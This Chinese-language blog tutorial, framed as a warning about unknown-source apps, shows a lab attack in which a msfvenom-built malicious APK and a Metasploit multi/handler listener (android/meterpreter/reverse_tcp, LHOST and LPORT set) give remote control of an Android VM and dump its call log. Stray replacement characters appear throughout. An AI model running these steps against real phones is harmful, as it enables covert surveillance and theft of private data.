如何使用Metasploit對安卓手機進行控制
本篇文章為大家展示了如何使用Metasploit對安卓手機進行控制�����,內容簡明扼要并且容易理解����,絕對能使你眼前一亮�,通過這篇文章的詳細介紹希望你能有所收獲�����。
如何使用Metasploit對安卓手機進行控制
現在大家每天的生活都離不開一樣東西——手機��。手機上的App給我們的生活帶來了許多歡樂與便利��,讓我們足不出戶便能知曉天下事�����。然而�,并不是所有App都是為我們服務的��,有些App可能會帶著惡意去接近我們�����。如果你的程序是從官方應用商店下載還比較安全��,若是從未知來源���,如網上論壇��,或者他人轉發等“不靠譜”的下載鏈接安裝���,那就比較危險了��。所以大部分安卓手機在你設置“允許安裝未知來源App”時都會彈出如下提醒:
別小看這一道“防護欄”���,他有可能會替你擋下一波又一波惡意App的進攻�。也許你可能會不以為然的關掉它:我只是裝個App而已����,它又不會偷我的錢����。
下面�����,我就會以一個惡意攻擊者的角度來告訴你����,未知來源的App有多危險�����!
環境:
攻擊機:Kali
靶機(受害者):FreeBSD安卓4.4.2虛擬機
過程:
首先我們查看并記錄Kali的ip地址:192.168.1.112.
利用Kali下的msfvenom生成惡意APK����,也就是安卓程序的安裝包��,LHOST為Kali的ip���,LPORT可隨意選擇一個不用的端口�。
成功生成一個apk�,我們先把它放著��。再啟動metasploit的監聽器�����,打開msfconsole控制臺(吐槽一句����,為什么好多Kali下的程序都搞這么花哨的歡迎界面����,大佬的世界我不懂)���。
打開后�,分別輸入:
use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.112
set LPORT 4444
這樣��,就設置好了攻擊模塊�����、Payload��、接收反彈連接主機的監聽端口等���,便可以開始攻擊了���。
輸入exploit�,等待結果���。
現在�,我們開始模仿受害者����,通過電子郵件收到了一個未知來源的apk���,名稱為“hh.apk”���。
開始安裝���,他并沒有提示我“未知來源“���,可能是因為這個安卓版本比較久遠了�����,那時還沒有現在這樣的信息安全保護意識吧�����。
這樣�,安裝完成�,我們已經不知不覺的踏入了“攻擊者“的陷阱中�����。點擊應用程序�����,發現并沒有什么響應���。但其實�����,我們此時已經被攻擊者掌控住了��。
如圖所示�,就是受害者已經被監控的提示����,圖中192.168.1.100就是安卓機的ip地址�����。
在這個頁面下�����,攻擊者基本可以操控手機的全部功能��、竊聽或查看手機的全部文件�����。舉個例子來說����,上圖中的“dump_call log“指令就是下載了安卓機的所有通話記錄����,并生成一個TXT文檔��。
這是我模擬手機���,撥打三家通信運營商的通話記錄����,分別是10001�����、10086和10010��。從圖中可以清楚的看到撥打號碼�、通話時間與撥打接聽方式�����。當然��,能做的事遠不止這些�。
上述內容就是如何使用Metasploit對安卓手機進行控制��,你們學到知識或技能了嗎�?如果還想學到更多技能或者豐富自己的知識儲備����,歡迎關注億速云行業資訊頻道����。
